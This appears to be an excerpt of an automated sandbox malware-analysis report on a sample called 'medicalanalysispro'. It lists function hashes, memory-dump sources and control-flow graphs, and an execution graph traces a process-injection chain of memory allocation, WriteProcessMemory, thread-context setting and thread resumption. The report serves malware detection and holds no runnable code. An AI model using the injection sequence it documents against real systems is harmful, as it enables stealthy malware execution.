                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1214682469-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 13cac0b9ca72075f5d7f1d00aa19e0549b75852ecd71447385bebf4ad58ecc71
                                                                                                                                                                                                                                                                                                              • Instruction ID: 1840633cfd582f2dec4aa1a1b092912ad3a21fc335e0e67727c74b93911d70a5
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13cac0b9ca72075f5d7f1d00aa19e0549b75852ecd71447385bebf4ad58ecc71
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66115131A0CB4286EA54AB15F844269FA61FB5AFE5F884734DF5D07B98EF3CD4408B10
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE77C40 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Char$Prev$Next
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 3260447230-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                                                                                                                                                                                                                                                                              • Instruction ID: 75264215254b868af85bfd6c852d87da76bb654215bed19ad3758eb847be9fac
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E11A762A0C69195FB992B15A900179FF91EB5FFE0F898270DB5E03788DF2CD8408720
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE78648 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 140117192-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                                                                                                                                                                                                                                                                              • Instruction ID: 45e97e4cfc8619e14ee19de9f0fa9f065b89a6cb670cbb40bf84f54f16a8892d
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E121A639A1CF4691E799AB48F880369B3A8FBAA744F900135DB8D42768FF7DD044C760
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE73B40 Relevance: 6.0, APIs: 4, Instructions: 43windowCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2776232527-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                                                                                                                                                                                                                                                                              • Instruction ID: 59277cf3752e9370d8704d33135904831454d12eef61bebfaa8d3e7104f23adc
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0115872B1CA4287E7E49F24E844A76FA90FFA6745F809135D75A42988EF3CD449CB10

                                                                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                                                                              Execution Coverage:10.6%
                                                                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                              Signature Coverage:4.4%
                                                                                                                                                                                                                                                                                                              Total number of Nodes:135
                                                                                                                                                                                                                                                                                                              Total number of Limit Nodes:3
                                                                                                                                                                                                                                                                                                              execution_graph 51219 5615900 51220 5615915 51219->51220 51221 561592b 51220->51221 51224 5615ff4 51220->51224 51230 5615dbb 51220->51230 51225 5615da5 51224->51225 51226 5615dba 51224->51226 51225->51221 51226->51225 51235 5617301 51226->51235 51246 5617310 51226->51246 51231 5615dc5 51230->51231 51233 5617301 4 API calls 51231->51233 51234 5617310 4 API calls 51231->51234 51232 5615f06 51232->51221 51233->51232 51234->51232 51236 5617325 51235->51236 51257 5617561 51236->51257 51260 561747e 51236->51260 51263 5617644 51236->51263 51266 56176f2 51236->51266 51269 5617350 51236->51269 51272 5617360 51236->51272 51275 56176e0 51236->51275 51278 56177f0 51236->51278 51247 5617325 51246->51247 51249 5617561 4 API calls 51247->51249 51250 56177f0 4 API calls 51247->51250 51251 56176e0 4 API calls 51247->51251 51252 5617360 4 API calls 51247->51252 51253 5617350 4 API calls 51247->51253 51254 56176f2 4 API calls 51247->51254 51255 5617644 4 API calls 51247->51255 51256 561747e 4 API calls 51247->51256 51248 5615f06 51248->51221 51249->51248 51250->51248 51251->51248 51252->51248 51253->51248 51254->51248 51255->51248 51256->51248 51258 56173cb 51257->51258 51281 5617d78 51258->51281 51261 56173cb 51260->51261 51262 5617d78 4 API calls 51261->51262 51262->51261 51264 56173cb 51263->51264 51265 5617d78 4 API calls 51264->51265 51265->51264 51267 56173cb 51266->51267 51268 5617d78 4 API calls 51267->51268 51268->51267 51270 5617360 51269->51270 51271 5617d78 4 API calls 51270->51271 51271->51270 51273 561738d 51272->51273 51274 5617d78 4 API calls 51273->51274 51274->51273 51276 56173cb 51275->51276 51277 5617d78 4 API calls 51276->51277 51277->51276 51279 56173cb 51278->51279 51280 5617d78 4 API calls 51279->51280 51280->51279 51282 5617d9d 51281->51282 51283 5617dbf 51282->51283 51293 56186e6 51282->51293 51297 561939e 51282->51297 51301 561895d 51282->51301 51305 561841b 51282->51305 51309 5618cce 51282->51309 51313 5618d4b 51282->51313 51317 5618b09 51282->51317 51321 56184c7 51282->51321 51325 5618f29 51282->51325 51283->51258 51294 56186f5 51293->51294 51329 56d12b8 51294->51329 51298 56193a8 51297->51298 51333 56d1d98 51298->51333 51302 561896a 51301->51302 51337 56d0900 51302->51337 51306 561824d 51305->51306 51307 561941f 51305->51307 51306->51283 51341 56d0fc0 51307->51341 51310 5618ce4 51309->51310 51312 56d0900 Wow64SetThreadContext 51310->51312 51311 5618d10 51312->51311 51314 5618d5a 51313->51314 51316 56d0900 Wow64SetThreadContext 51314->51316 51315 561824d 51315->51283 51316->51315 51318 5618b1b 51317->51318 51320 56d12b8 WriteProcessMemory 51318->51320 51319 561824d 51319->51283 51320->51319 51322 56193c4 51321->51322 51323 561824d 51321->51323 51324 56d1d98 NtResumeThread 51322->51324 51323->51283 51324->51323 51326 5618f2f 51325->51326 51328 56d12b8 WriteProcessMemory 51326->51328 51327 561824d 51327->51283 51328->51327 51330 56d1304 WriteProcessMemory 51329->51330 51332 5618766 51330->51332 51332->51283 51334 56d1de1 NtResumeThread 51333->51334 51336 561824d 51334->51336 51336->51283 51338 56d0949 Wow64SetThreadContext 51337->51338 51340 5618d10 51338->51340 51342 56d1004 VirtualAllocEx 51341->51342 51344 56d107c 51342->51344 51344->51306 51194 93d030 51195 93d048 51194->51195 51196 93d0a3 51195->51196 51198 55d1620 51195->51198 51199 55d1679 51198->51199 51202 55d1b80 51199->51202 51200 55d16ae 51203 55d1bad 51202->51203 51206 55d1d43 51203->51206 51207 55d0ab8 51203->51207 51206->51200 51209 55d0adf 51207->51209 51211 55d0f98 51209->51211 51212 55d0fe1 VirtualProtect 51211->51212 51214 55d0b9c 51212->51214 51214->51200 51345 21b2cf8 51346 21b2d15 51345->51346 51347 21b2d25 51346->51347 51350 21b565b 51346->51350 51353 21b6a09 51346->51353 51352 55d0ab8 VirtualProtect 51350->51352 51351 21b5679 51352->51351 51354 21b6a28 51353->51354 51356 55d0ab8 VirtualProtect 51354->51356 51355 21b6a4c 51356->51355 51357 5938de0 51358 5938df5 51357->51358 51362 5938e11 51358->51362 51367 5938e20 51358->51367 51359 5938e0b 51363 5938e47 51362->51363 51364 5939044 51363->51364 51372 593cc10 51363->51372 51376 593cc18 51363->51376 51364->51359 51369 5938e47 51367->51369 51368 5939044 51368->51359 51369->51368 51370 593cc10 SleepEx 51369->51370 51371 593cc18 SleepEx 51369->51371 51370->51369 51371->51369 51373 593cc18 SleepEx 51372->51373 51375 593ccbc 51373->51375 51375->51363 51377 593cc5c SleepEx 51376->51377 51379 593ccbc 51377->51379 51379->51363 51215 561f758 51216 561f7a7 NtProtectVirtualMemory 51215->51216 51218 561f81f 51216->51218

                                                                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                                                                              Function 05794B50 Relevance: 16.2, Strings: 12, Instructions: 1170COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                                                                                                              • API String ID: 0-312445597
                                                                                                                                                                                                                                                                                                              • Opcode ID: 1ca823d46fe952ca6623661c819739b88731d35be1b4a85c3d2080bbd159c650
                                                                                                                                                                                                                                                                                                              • Instruction ID: ad0fb0ecea3d8f64d10a3a2d6fe3e1efbf4a00b226b968474bd5801959fe0f25
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ca823d46fe952ca6623661c819739b88731d35be1b4a85c3d2080bbd159c650
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FB21934A002288FDB19DFA8D884FADB7B6BF88700F148599E505AB3A5DB70DC45DF60
                                                                                                                                                                                                                                                                                                              Function 05794E87 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: ,bq$4$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                                                                                                              • API String ID: 0-2546334966
                                                                                                                                                                                                                                                                                                              • Opcode ID: 85b468f6683883b605d8eca5d7fc2f7b9a81e3f5fc2a53b2e79c840bfeaf2948
                                                                                                                                                                                                                                                                                                              • Instruction ID: b911ca872c331cd5ad0d22e7870dc4908b8f3bc6ac18b31e284d1fb96d5f08b1
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 85b468f6683883b605d8eca5d7fc2f7b9a81e3f5fc2a53b2e79c840bfeaf2948
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD220934A00229CFDF29DF64D984BA9B7B6FF48304F1481A5E509AB3A5DB309D85DF60
                                                                                                                                                                                                                                                                                                              Function 057984D0 Relevance: 4.4, Strings: 3, Instructions: 669COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: (_^q$Pl^q$$^q
                                                                                                                                                                                                                                                                                                              • API String ID: 0-912065397
                                                                                                                                                                                                                                                                                                              • Opcode ID: 67854d0c4139b22e1db8a0ae439a153e3f73452bc56526f3c8ce3fd14c2e5a03
                                                                                                                                                                                                                                                                                                              • Instruction ID: 4785bc201067c764472fd167b620ce60338c4817f3bfe88cee9cf8c2b135b80e
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67854d0c4139b22e1db8a0ae439a153e3f73452bc56526f3c8ce3fd14c2e5a03
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C424B34B002088FCB18DF29D598A6A77F6BF8A714F1584A9E506CF365DB31DC42DB62
                                                                                                                                                                                                                                                                                                              Function 057905F8 Relevance: 4.2, Strings: 3, Instructions: 423COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 1355 57905f8-579069e 1360 57906ae-57906b4 1355->1360 1361 57906a0-57906a6 1355->1361 1362 57906bd-57906be 1360->1362 1363 57906b6 1360->1363 1361->1360 1366 579075e-5790816 1362->1366 1363->1362 1364 579081b-57908c6 1363->1364 1365 579090b-5790950 1363->1365 1363->1366 1367 57906c3-5790759 1363->1367 1368 57908d7-5790906 1363->1368 1364->1360 1394 57908cc-57908d2 1364->1394 1379 579095a-579095f 1365->1379 1380 5790952-5790958 1365->1380 1366->1360 1367->1360 1383 5790961-5790962 1379->1383 1384 5790964-57909b2 1379->1384 1380->1379 1383->1384 1395 57909bc-57909c1 1384->1395 1396 57909b4-57909ba 1384->1396 1394->1360 1398 57909c3-57909c4 1395->1398 1399 57909c6-5790a06 1395->1399 1396->1395 1398->1399 1402 5790a08-5790a10 1399->1402 1403 5790a12-5790a18 1399->1403 1402->1403 1404 5790a1a 1403->1404 1405 5790a21-5790a22 1403->1405 1404->1405 1406 5790bd8-5790c1e 1404->1406 1407 5790dbb-5790dbc 1404->1407 1408 5790c9a-5790ce5 1404->1408 1409 5790abf-5790adc 1404->1409 1410 5790dbe 1404->1410 1411 5790cf2-5790cf3 1404->1411 1412 5790b15-5790b5a 1404->1412 1413 5790bd5-5790bd6 1404->1413 1414 5790cf5 1404->1414 1415 5790a54-5790aac 1404->1415 1416 5790c2b 1404->1416 1417 5790d62-5790dae 1404->1417 1418 5790a27-5790a4a 1404->1418 1419 5790b66 1404->1419 1405->1409 1433 5790bc0-5790bc9 1406->1433 1453 5790c20-5790c29 1406->1453 1421 5790dbf 1407->1421 1435 5790c85-5790c8e 1408->1435 1455 5790ce7-5790cf0 1408->1455 1420 5790b67 1409->1420 1430 5790ae2-5790af9 1409->1430 1410->1421 1425 5790cf6 1411->1425 1437 5790b03-5790b09 1412->1437 1451 5790b5c-5790b64 1412->1451 1422 5790c2c 1413->1422 1414->1425 1415->1403 1454 5790ab2-5790aba 1415->1454 1416->1422 1432 5790d4d-5790d56 1417->1432 1452 5790db0-5790db9 1417->1452 1418->1403 1423 5790a4c-5790a52 1418->1423 1419->1420 1420->1433 1434 5790dc0 1421->1434 1422->1435 1423->1403 1425->1432 1436 5790afb-5790b01 1430->1436 1430->1437 1438 5790d58 1432->1438 1439 5790d5f-5790d60 1432->1439 1445 5790bcb 1433->1445 1446 5790bd2-5790bd3 1433->1446 1434->1434 1441 5790c90 1435->1441 1442 5790c97-5790c98 1435->1442 1436->1437 1448 5790b0b 1437->1448 1449 5790b12-5790b13 1437->1449 1438->1407 1438->1410 1438->1417 1438->1439 1439->1410 1441->1407 1441->1408 1441->1410 1441->1411 1441->1414 1441->1417 1441->1442 1442->1408 1445->1406 1445->1407 1445->1408 1445->1410 1445->1411 1445->1413 1445->1414 1445->1416 1445->1417 1445->1446 1446->1416 1448->1406 1448->1407 1448->1408 1448->1410 1448->1411 1448->1412 1448->1413 1448->1414 1448->1416 1448->1417 1448->1419 1448->1449 1449->1412 1451->1437 1452->1432 1453->1433 1454->1403 1455->1435
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: (t$#$0Nj$Te^q
                                                                                                                                                                                                                                                                                                              • API String ID: 0-2313792343
                                                                                                                                                                                                                                                                                                              • Opcode ID: 9a1dadff0c0cf9523aeb4d3b84e01094a14a8bdcc9a8adb9a6072a5ad4f72587
                                                                                                                                                                                                                                                                                                              • Instruction ID: 4918ab89185c214416fb55ebfd1584837d477a39e562f365d9bec35ad69cfa67
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a1dadff0c0cf9523aeb4d3b84e01094a14a8bdcc9a8adb9a6072a5ad4f72587
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27120774A14219CFDB68DF58D889BEDB7F2FB89304F1080AAD409A7295DB709D81DF60
                                                                                                                                                                                                                                                                                                              Function 05937B17 Relevance: 2.7, Strings: 2, Instructions: 238COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 2754 5937b17-5937b70 2757 5937b72 2754->2757 2758 5937b77-5937b9a 2754->2758 2757->2758 2761 5937b9d-5937ba3 2758->2761 2762 5937ba5 2761->2762 2763 5937bac-5937bad 2761->2763 2764 5937e12-5937e13 2762->2764 2765 5937c92-5937d54 call 5936de8 2762->2765 2766 5937bd0-5937bd6 2762->2766 2767 5937e70-5937e71 2762->2767 2768 5937bd7-5937c07 call 5936de8 2762->2768 2769 5937d67-5937dff 2762->2769 2770 5937e47-5937e6b 2762->2770 2771 5937e76-5937e77 2762->2771 2772 5937e15-5937e19 2762->2772 2773 5937c6b-5937c6f 2762->2773 2774 5937baf-5937bc6 2762->2774 2763->2766 2763->2774 2775 5937e78-5937e7a 2764->2775 2781 5937c56-5937c5c 2765->2781 2806 5937d5a-5937d62 2765->2806 2767->2766 2795 5937c10-5937c54 2768->2795 2769->2781 2800 5937e05-5937e0d 2769->2800 2770->2781 2771->2775 2772->2770 2776 5937e1b-5937e34 2772->2776 2773->2765 2777 5937c71-5937c88 2773->2777 2774->2761 2778 5937bc8-5937bce 2774->2778 2775->2766 2776->2781 2782 5937e3a-5937e42 2776->2782 2777->2781 2783 5937c8a-5937c90 2777->2783 2778->2761 2788 5937c65-5937c66 2781->2788 2789 5937c5e 2781->2789 2782->2781 2783->2781 2788->2767 2788->2773 2789->2764 2789->2765 2789->2767 2789->2769 2789->2770 2789->2771 2789->2772 2789->2773 2795->2781 2800->2781 2806->2781
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2229679987.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5930000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: 0Nj$dbq
                                                                                                                                                                                                                                                                                                              • API String ID: 0-642774373
                                                                                                                                                                                                                                                                                                              • Opcode ID: 0c81e609c692248503b9b6ff5b0838926e76daf5b7a96def5b086fcdbd680508
                                                                                                                                                                                                                                                                                                              • Instruction ID: 51810bc4c720c168b69a89d67f577515753f5ae645dc1c16f7e10382c3236f5d
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c81e609c692248503b9b6ff5b0838926e76daf5b7a96def5b086fcdbd680508
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE914DB0904218CFDB20DFA8D889BEDBBB6FB49304F108569D409AB395DB749E85CF11
                                                                                                                                                                                                                                                                                                              Function 05937B50 Relevance: 2.7, Strings: 2, Instructions: 203COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2229679987.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5930000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: 0Nj$dbq
                                                                                                                                                                                                                                                                                                              • API String ID: 0-642774373
                                                                                                                                                                                                                                                                                                              • Opcode ID: a3e10df3f3340c5b6705447757922eaeb66d10b142be31682b1c9e196343c50d
                                                                                                                                                                                                                                                                                                              • Instruction ID: 63c2445022cba712e3a5855fbc6f6d21f924fc63a8631108fd0f9f529438158e
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3e10df3f3340c5b6705447757922eaeb66d10b142be31682b1c9e196343c50d
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6912CB4904218CFEB20DFA8D889BEDBBB6FB49304F108569D009A7395DB749E85CF11
                                                                                                                                                                                                                                                                                                              Function 0561F758 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0561F80D
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2227425285.0000000005610000.00000040.00000800.00020000.00000000.sdmp, Offset: 05610000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5610000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2706961497-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 945378436a7627d2e710cb8cc26ea8a1f7720745208ab62debc479de663fe5b8
                                                                                                                                                                                                                                                                                                              • Instruction ID: ba1c45a494ed1e381d1396bfb859a5b949a4c2eba16176ae875eb2cc3210d80b
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 945378436a7627d2e710cb8cc26ea8a1f7720745208ab62debc479de663fe5b8
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 834178B5D042589FCF10CFA9D980ADEFBB1FB49310F14942AE819B7210D735A946CF68
                                                                                                                                                                                                                                                                                                              Function 0561F751 Relevance: 1.6, APIs: 1, Instructions: 104nativeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0561F80D
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2227425285.0000000005610000.00000040.00000800.00020000.00000000.sdmp, Offset: 05610000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5610000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2706961497-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: cf0b4e44738861a171e3a2fe56202de968e7a275431d29bad72cb81e8af615ca
                                                                                                                                                                                                                                                                                                              • Instruction ID: f776c218fd7a6121e5a143c25fcda5168125175f8b1a7c38ab52fe00b4a8401d
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf0b4e44738861a171e3a2fe56202de968e7a275431d29bad72cb81e8af615ca
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D14169B5D05258DFCF10CFA9D980ADEFBB1BB49310F14942AE815B7210D735A946CF68
                                                                                                                                                                                                                                                                                                              Function 056D1D98 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              • NtResumeThread.NTDLL(?,?), ref: 056D1E26
                                                                                                                                                                                                                                                                                                              Memory Dump Source
